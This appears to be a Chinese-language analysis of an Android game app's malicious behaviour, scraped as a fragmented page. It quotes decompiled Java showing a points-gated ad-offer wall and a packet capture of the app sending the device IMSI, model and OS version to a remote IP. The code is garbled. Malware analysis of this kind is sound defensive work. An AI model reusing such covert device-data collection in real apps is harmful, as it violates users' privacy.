1、Android恶意代码分析Android恶意代码分析 允许安装程序 允许程序访问有关GSM网络信息 允许程序访问Wi-Fi网络状态信息 读取电话状态允许一个程序获取信息有关当前或最近运行的任务,一个缩略的任务状态,是否活动等等恶意activity /代码分析分析程序入口protected void onCreate(Bundle paramBundle) / this.settings = getSharedPreferences(MainActivity, 0); super.onCreate(paramBundle); setVolumeControlStream(3); setTitle
2、(2131165197); getListView().setOnCreateContextMenuListener(this); this.creatingShortcut = android.intent.action.CREATE_SHORTCUT.equals(getIntent().getAction(); aeo(); /此函数中会开启 / public void aeo() this.Captain = new Captain(this); if (this.Captain.isOpen() & (!Captain.PN.isGame) AppConnect.getInstanc
3、e(a5a4c7af109259db240c3a6917409553, WAPS, this);/写入数据,获取网络状态 AppConnect.getInstance(this).setAdViewClassName(com.androidemu.gba.gba.Mym);/ OfferName= com.androidemu.gba.gba.Mym 存储到AppSettings startActivity(new Intent(this, LogOut.class); 开启 finish(); while (true) return; Captain.PN.isGame = false; k
4、lz(); /分析class LogOut extends Activitypublic void onCreate(Bundle paramBundle) requestWindowFeature(1); getWindow().setFlags(1024, 1024); super.onCreate(paramBundle);bujuset();/显示 积分大于0即可永久免费无广告全屏运行等的窗口如果积分大于0开始真正的游戏,否则如果“获取积分被点击”联网显示应用列表上传手机信息。 AppConnect.getInstance(this); private void bujuset() L
5、inearLayout localLinearLayout = new LinearLayout(this); localLinearLayout.setGravity(17); localLinearLayout.setOrientation(1); TextView localTextView1 = new TextView(this); TextView localTextView2 = new TextView(this); localTextView2.setId(1); localTextView1.setWidth(-2); localTextView2.setWidth(-2)
6、; localTextView1.setGravity(17); localTextView2.setGravity(17); Button localButton1 = new Button(this); Button localButton2 = new Button(this); localButton1.setHeight(90); localButton2.setHeight(90); ImageView localImageView = new ImageView(this); localImageView.setImageResource(2130837504); localTe
7、xtView1.setText(积分大于0即可永久免费无广告全屏运行); localTextView2.setText(积分加载中.); localButton1.setText(开始游戏); localButton2.setText(免费获取积分); localLinearLayout.addView(localImageView); localLinearLayout.addView(localTextView1); localLinearLayout.addView(localTextView2); localLinearLayout.addView(localButton1); loc
8、alLinearLayout.addView(localButton2); setContentView(localLinearLayout); localButton1.setOnClickListener(new View.OnClickListener()/点击开始游戏 public void onClick(View paramView) if (LogOut.this.point 0)/如果几分大于0那么进入游戏 com.trendy.pokemontk.Captain.PN.isGame = true; Intent localIntent = LogOut.this.getBas
9、eContext().getPackageManager().getLaunchIntentForPackage(LogOut.this.getBaseContext().getPackageName(); localIntent.addFlags(67108864); LogOut.this.startActivity(localIntent);/开启游戏的activity com.trendy.pokemontk.Alarmreceiver LogOut.this.finish(); while (true) return; com.trendy.pokemontk.Captain.PN.
10、isGame = false; Toast.makeText(LogOut.this.getApplicationContext(), 积分不足,请点击免费获取积分的按钮, 1).show(); ); localButton2.setOnClickListener(new View.OnClickListener()/点击获取积分 public void onClick(View paramView) AppConnect.getInstance(paramView.getContext().showOffers(paramView.getContext(); ); public void s
11、howOffers(Context paramContext) a(paramContext, b, y.e + this.H); paramContext, b,http:/app /action/ account/offerlist? private void a(Context paramContext, String paramString1, String paramString2) try Intent localIntent = new Intent(paramContext, h(paramContext);/参数二: com.androidemu.gba.gba.Mym/另:
12、public class Mym extends OffersWebView localIntent.setFlags(268435456); localIntent.putExtra(Offers_URL, paramString2); /http:/app /action/ account/offerlist?广告应用列表地址 localIntent.putExtra(USER_ID, paramString1); localIntent.putExtra(URL_PARAMS, c); localIntent.putExtra(CLIENT_PACKAGE, this.J); local
13、Intent.putExtra(offers_webview_tag, OffersWebView); paramContext.startActivity(localIntent);/启动activity com.androidemu.gba.gba.Mym显示 广告 发送手机型号 系统版本 IMSI icd 等信息到219.234.85.220 return; catch (Exception localException) while (true) localException.printStackTrace(); 分析 com.androidemu.gba.gba.Mymcom.and
14、roidemu.gba.gba.Mym的解析出现错误但是根据开启activity的intentl ocalIntent.putExtra(USER_ID, paramString1); localIntent.putExtra(URL_PARAMS, c); localIntent.putExtra(CLIENT_PACKAGE, this.J); localIntent.putExtra(offers_webview_tag, OffersWebView);可以推断这个部分是显示应用列表上传手机的相关信息。如下图waps/SDKUtils包含的api以及抓包的分析也可以可推断。抓包 1510
15、 249.394056000 27.18.59.151 219.234.85.220 HTTP 607 GET /action/connect/active?app_id=a5a4c7af109259db240c3a6917409553&udid=250824171159829&imsi=310260371538173&net=wifi&base=&app_version=1.3.8&sdk_version=1.7.1&device_name=GT-N7000&device_brand=samsung&y=5ab68cc24a4025769552c1aec9cc36d7&device_type=android&os_version=2.3.4&country_code=CN&language=zh&cid=5ist3abgr1f1jt30q0sff2pkd81j7gsc&act=com.trendy.pokemontk.MainActivity&channel=WAPS&device_width=1024&device_height=600&at=1355563304240 HTTP/1.1如上抓包的内容显示程序上传了手机型号 系统版本 imsi 等等信息
copyright@ 2008-2022 冰豆网网站版权所有
经营许可证编号:鄂ICP备2022015515号-1